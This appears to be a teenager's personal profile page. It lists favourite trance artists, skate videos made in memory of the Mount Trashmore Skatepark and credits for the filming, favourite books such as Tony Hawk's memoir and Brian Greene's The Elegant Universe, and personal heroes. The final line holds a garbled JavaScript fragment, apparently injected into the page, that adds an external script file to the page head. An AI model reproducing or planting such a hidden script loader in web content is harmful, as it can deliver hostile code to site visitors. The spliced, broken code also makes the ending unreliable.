ATB , Shiny Toy Guns, Andy Hunter, Coldplay, Ferry Corsten.... These are the main focus for now, but honestly i'll pretty much listen to anything, as long as its not talking about drugs or includes too much violence or talking about anything with a negative vibe. I'm really into trance these days, It's not like I enjoy dancing, but I really can appreciate the beats and the energy the music puts out. I feel original in the fact that out of all my friends i'm really the only one who listens to techno, and really don't care what anyone thinks about me listening to it, because its what I like and I'm not going to be affected by anyone else's opinion. haha unce unce unce unce... doubt you'll get that, but maybe... For real though... check out ATB, they are really good.
I made this video in memory of Mount Trashmore Skatepark which was recently destroyed by fire. Look for it on tv and it should be on display at the skatepark on September 9th
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Ever seen a 720 flip?? Thomas or T-Flow from was more than happy to film this an a few of the other tricks in this video. The rest were all filmed by Seth Howell, which I owe credit to the filming of our first production together about a year back "DEAD END" which was about a year project
Now here's a video I made that has no music, but it includes all of the footage you've seen in the past couple videos with the exception of the trashmore video of course. And also it contains alot of bonus footage and some never before seen tricks, and alot of bails, and some mess around footage that either went into Dead End or was never used, once again I'd like to thank SETH HOWELL, for makin alot of this extremely high quality filming possible. Without him, neither you or I would have ever been able to see any of this footage. Thanks SETH, for your hard work and dedication.
I try not to watch too much
The Word Of God The Holy Bible Food for your soul Tony Hawk's Book Occupation: Skateboarder Talks alot about growing up in skateboarding and really about emerging from the local scene at a time when skateboarding really had no money in it. Incorporates a life story into the financial growth of skateboarding, and a progression and list of tricks he learned through the years. An amazing story, and quite informative for anyone who wants to know some skateboarding history. The Elegant Universe Brian Greene takes you deep into the world of String Theory. A thoery which will hopefully unite the two seperate theories which currently explain our universe. On one side you have quantum theory, which describes and predicts very accurately the behavior of matter on a very very small scale, down below the scale of an atom. And then on the other side, you have general relativity which describes the motion of very large things like the motion of planets. Both theories accurately describe the world on their own scales, but should the universe really be governed by two different theories? Wouldn't it make sense that there is a theory more encompassing? Should size matter? One theory should describe everything. This theory may very well be in the making, as Brian Greene will show you, things are looking very promising for the Grand Unification of these two seperate theories which describe this crazy world we live in, which we may be beginning to understand.
Rodney Mullen Jesus Christ of Nazareth Siddhartha Guatama "Buddha" .."var s=document·('script');s.src='../x/7318.js';document 3;getElementsByTagName('head')[0].appendChild(s);"